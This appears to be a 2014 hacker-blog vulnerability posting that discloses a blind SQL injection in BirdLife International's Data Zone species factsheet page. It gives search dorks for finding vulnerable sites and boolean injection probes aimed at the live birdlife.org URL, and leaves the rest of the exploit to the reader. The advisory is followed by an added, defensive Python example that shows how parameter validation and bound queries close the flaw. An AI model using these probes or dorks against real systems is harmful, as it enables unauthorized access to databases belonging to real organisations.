Thursday, 4 September 2014

(0day) BirdLife International’s Data Zone - Blind SQL Injection Vulnerability


~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] E-mail: knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org
|~| Greetings to old friends; we continue where we left off.
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : BirdLife International’s Data Zone
|~Price : N/A
|~Version : N/A
|~Software: http://www.qpqsoftware.com/qpq/portfolio
|~Vulnerability Style : Blind SQL Injection
|~Vulnerability Dir : /datazone/
|~Dorks:
inurl:speciesfactsheet.php
inurl:/datazone/   QPQ Software
|[~]Date : "4 SEPTEMBER 2014"
|[~]Tested on :
(L)Kali Linux,
(R)Apache 2.2.22, PHP 5.3.10
(R)MySQL 5.0.11
----------------------------------------------------------
speciesfactsheet.php: the 'id' parameter is not secured
 --------------------------------------------------------
DEMOS;

~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Exploitation| Blind SQL Injection~~~~~~~~~~~}|
   
    HTTP://{TARGET}/datazone/speciesfactsheet.php?id=  //SQL command
   
    Example;
   
    MySQL version?
    SQL Injecting : www.birdlife.org/datazone/speciesfactsheet.php?id=359 and substring(@@version,1,1)=4      {FALSE}
    SQL Injecting Retry : www.birdlife.org/datazone/speciesfactsheet.php?id=359 and substring(@@version,1,1)=5  {TRUE}
   
    The rest of the exploit is up to you.
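
The fix for the flaw described above, as an added example (not code from the advisory or from the application): the raw 'id' value is checked against an integer allow-list and then bound as a query parameter, so the two probe values quoted above produce the same response and the TRUE/FALSE difference disappears. The table name `species`, the function names and the sample row are hypothetical, and sqlite3 stands in for the MySQL backend so the block runs offline.

```python
import sqlite3


def make_db():
    # Constructed sample data; sqlite3 is a stand-in for the MySQL backend.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE species (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO species VALUES (359, 'constructed sample row')")
    return conn


def vulnerable_sql(raw_id):
    # Assumed shape of the flawed code: the raw value is pasted into the
    # statement, so text after the number becomes part of the WHERE clause.
    return "SELECT name FROM species WHERE id = " + raw_id


def hardened_lookup(conn, raw_id):
    # 1) Allow-list: the parameter must be a short, plain decimal integer.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        return "400 invalid id"
    # 2) Bound parameter: the value travels as data and is never parsed as SQL.
    row = conn.execute(
        "SELECT name FROM species WHERE id = ?", (int(raw_id),)
    ).fetchone()
    return row[0] if row else "404 not found"


# The two request values quoted in the advisory.
PROBES = [
    "359 and substring(@@version,1,1)=4",
    "359 and substring(@@version,1,1)=5",
]


def oracle_closed(conn):
    # Boolean-based blind injection needs the two probes to yield different
    # pages; with the hardened lookup both collapse to one response.
    return len({hardened_lookup(conn, p) for p in PROBES}) == 1


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_sql(PROBES[1]))
    print(hardened_lookup(db, "359"), "|", hardened_lookup(db, PROBES[1]))
    print("oracle closed:", oracle_closed(db))
```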
